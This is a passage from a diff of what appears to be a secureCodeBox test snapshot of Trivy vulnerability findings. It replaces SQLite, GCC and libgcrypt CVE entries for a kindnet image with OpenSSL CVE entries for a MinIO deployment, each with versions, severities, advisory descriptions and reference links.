"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", - ], - }, - "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", + "name": "timing attack in RSA Decryption implementation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5305", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5328", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5466", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-13627", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", - "http://www.openwall.com/lists/oss-security/2019/10/02/2", - "https://access.redhat.com/security/cve/CVE-2019-13627", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", - "https://dev.gnupg.org/T4683", - "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", - "https://linux.oracle.com/cve/CVE-2019-13627.html", - "https://linux.oracle.com/errata/ELSA-2020-4482.html", - "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", - "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", - "https://minerva.crocs.fi.muni.cz/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", - "https://security-tracker.debian.org/tracker/CVE-2019-13627", - "https://security.gentoo.org/glsa/202003-32", - "https://ubuntu.com/security/notices/USN-4236-1", - "https://ubuntu.com/security/notices/USN-4236-2", - "https://ubuntu.com/security/notices/USN-4236-3", - "https://usn.ubuntu.com/4236-1/", - "https://usn.ubuntu.com/4236-2/", - "https://usn.ubuntu.com/4236-3/", - "https://www.cve.org/CVERecord?id=CVE-2019-13627", - ], - }, - "category": "Vulnerability", - "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: ECDSA timing attack allowing private key leak", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-13627", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-13627", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://dev.gnupg.org/T4683", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://minerva.crocs.fi.muni.cz/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-32", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-1", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-2", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-1/", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-2/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-3/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.8.4-5+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-40528", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5311", - "https://access.redhat.com/security/cve/CVE-2021-40528", - "https://bugzilla.redhat.com/2002816", - "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", - "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2022-5311.html", - "https://errata.rockylinux.org/RLSA-2022:5311", - "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", - "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", - "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", - "https://linux.oracle.com/cve/CVE-2021-40528.html", - "https://linux.oracle.com/errata/ELSA-2022-9564.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent 